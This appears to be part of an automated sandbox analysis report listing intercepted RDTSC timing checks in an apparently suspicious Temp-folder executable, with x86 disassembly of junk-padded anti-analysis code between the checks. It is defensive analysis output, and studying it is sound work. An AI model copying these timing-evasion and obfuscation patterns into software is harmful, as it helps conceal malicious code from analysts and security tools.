Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD0AAE second address: CD0ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD0ABC second address: CD0AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD0AC1 second address: CD0AC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD0AC7 second address: CD0B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+124563FCh] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov ebx, 1914DE86h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 jg 00007FC9F53C6A7Ch 0x00000028 mov eax, dword ptr [ebp+122D009Dh] 0x0000002e mov di, 74E9h 0x00000032 push FFFFFFFFh 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FC9F53C6A78h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e nop 0x0000004f jno 00007FC9F53C6A84h 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 push ecx 0x0000005a pop ecx 0x0000005b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD1C52 second address: CD1C82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC9F53DFD65h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD4AB8 second address: CD4AC2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC9F53C6A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD5B73 second address: CD5BE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC9F53DFD62h 0x0000000f nop 0x00000010 mov ebx, dword ptr [ebp+122D3667h] 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D2D18h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007FC9F53DFD58h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a cmc 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FC9F53DFD65h 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD5BE3 second address: CD5BE8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD6BD7 second address: CD6C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007FC9F53DFD58h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 or dword ptr [ebp+12458794h], eax 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007FC9F53DFD58h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 movzx ebx, di 0x00000046 push 00000000h 0x00000048 mov bl, DBh 0x0000004a xchg eax, esi 0x0000004b jmp 00007FC9F53DFD62h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push ebx 0x00000054 push esi 0x00000055 pop esi 0x00000056 pop ebx 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD6C41 second address: CD6C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD7B92 second address: CD7BA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD7BA9 second address: CD7C38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c jmp 00007FC9F53C6A7Bh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pop ecx 0x00000015 nop 0x00000016 add bx, 8962h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007FC9F53C6A78h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 sub dword ptr [ebp+122D1F24h], eax 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007FC9F53C6A78h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 00000017h 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 mov dword ptr [ebp+122D1BF4h], ebx 0x0000005f xchg eax, esi 0x00000060 push ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FC9F53C6A7Bh 0x00000068 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD8E25 second address: CD8E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD9DD6 second address: CD9DE8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC9F53C6A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FC9F53C6A7Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDBEE8 second address: CDBEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDBEEF second address: CDBF11 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FC9F53C6A88h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDBF11 second address: CDBF45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC9F53DFD56h 0x00000008 jmp 00007FC9F53DFD5Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 jmp 00007FC9F53DFD68h 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDBF45 second address: CDBF64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A89h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDBF64 second address: CDBF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDC6FA second address: CDC6FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD6D86 second address: CD6D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDFE15 second address: CDFE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C8BA79 second address: C8BA8D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC9F53DFD5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C8BA8D second address: C8BACB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A86h 0x00000007 jmp 00007FC9F53C6A87h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jl 00007FC9F53C6A76h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C8BACB second address: C8BADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007FC9F53DFD56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C8BADC second address: C8BAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD7DBA second address: CD7DF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC9F53DFD69h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD7DF1 second address: CD7E59 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC9F53C6A87h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, 390A91FFh 0x00000010 push dword ptr fs:[00000000h] 0x00000017 and di, F7DCh 0x0000001c movsx edi, dx 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push eax 0x00000027 clc 0x00000028 pop edi 0x00000029 mov eax, dword ptr [ebp+122D0081h] 0x0000002f movsx edi, si 0x00000032 push FFFFFFFFh 0x00000034 mov edi, dword ptr [ebp+122D35C3h] 0x0000003a and edi, 7F268BD7h 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FC9F53C6A84h 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD7E59 second address: CD7E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a js 00007FC9F53DFD5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD7E6B second address: CD7E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnc 00007FC9F53C6A76h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD9F64 second address: CD9F8A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC9F53DFD5Ch 0x00000008 jno 00007FC9F53DFD56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC9F53DFD63h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CD9F8A second address: CD9F8F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDA02F second address: CDA039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FC9F53DFD56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDA039 second address: CDA04C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FC9F53C6A76h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDA04C second address: CDA056 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC9F53DFD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CDC8BB second address: CDC8BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7C5CC second address: C7C5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7C5D6 second address: C7C5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CE9823 second address: CE9827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C7E085 second address: C7E0A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FC9F53C6A84h 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CEEFD1 second address: CEF00D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC9F53DFD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FC9F53DFD5Ah 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push esi 0x0000001b pop esi 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC9F53DFD68h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF37D5 second address: CF380A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC9F53C6A86h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC9F53C6A7Eh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF4128 second address: CF412C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF42A6 second address: CF42DB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC9F53C6A76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FC9F53C6A9Fh 0x00000012 jns 00007FC9F53C6A7Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007FC9F53C6A83h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF442A second address: CF4430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF476E second address: CF4772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF48B2 second address: CF48B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF48B6 second address: CF48BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF4A29 second address: CF4A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jp 00007FC9F53DFD56h 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CF4A36 second address: CF4A3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFED08 second address: CFED24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD66h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFED24 second address: CFED52 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007FC9F53C6A76h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007FC9F53C6A88h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C89F46 second address: C89F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C89F4A second address: C89F50 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C89F50 second address: C89F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC9F53DFD62h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C89F6B second address: C89F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C89F71 second address: C89F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC9F53DFD56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: C89F7B second address: C89F9B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC9F53C6A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FC9F53C6A81h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFDA63 second address: CFDA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFDA67 second address: CFDA7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jns 00007FC9F53C6A76h 0x0000000d jns 00007FC9F53C6A76h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFDA7B second address: CFDA9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD69h 0x00000009 jne 00007FC9F53DFD56h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFDA9E second address: CFDACC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC9F53C6A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push edx 0x0000000e jp 00007FC9F53C6A76h 0x00000014 jmp 00007FC9F53C6A83h 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFDD67 second address: CFDD6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFE2CA second address: CFE2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFE2D0 second address: CFE2D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFE2D9 second address: CFE2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFE421 second address: CFE43D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FC9F53DFD56h 0x00000009 jnl 00007FC9F53DFD56h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007FC9F53DFD56h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFE43D second address: CFE441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFE709 second address: CFE70F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFEB4E second address: CFEB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFEB52 second address: CFEB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9F53DFD66h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CFEB74 second address: CFEB97 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC9F53C6A76h 0x00000008 jmp 00007FC9F53C6A84h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pushad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: D0346A second address: D0348F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FC9F53DFD67h 0x0000000a pop edx 0x0000000b jp 00007FC9F53DFD5Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC2D40 second address: CAAD13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jnp 00007FC9F53C6A7Ch 0x0000000e mov dword ptr [ebp+122D2D89h], edi 0x00000014 call dword ptr [ebp+1245E68Ah] 0x0000001a push edi 0x0000001b jmp 00007FC9F53C6A80h 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC35C9 second address: CC35CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: CC3C94 second address: CC3C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC9F53C6A76h 0x0000000a rdtsc
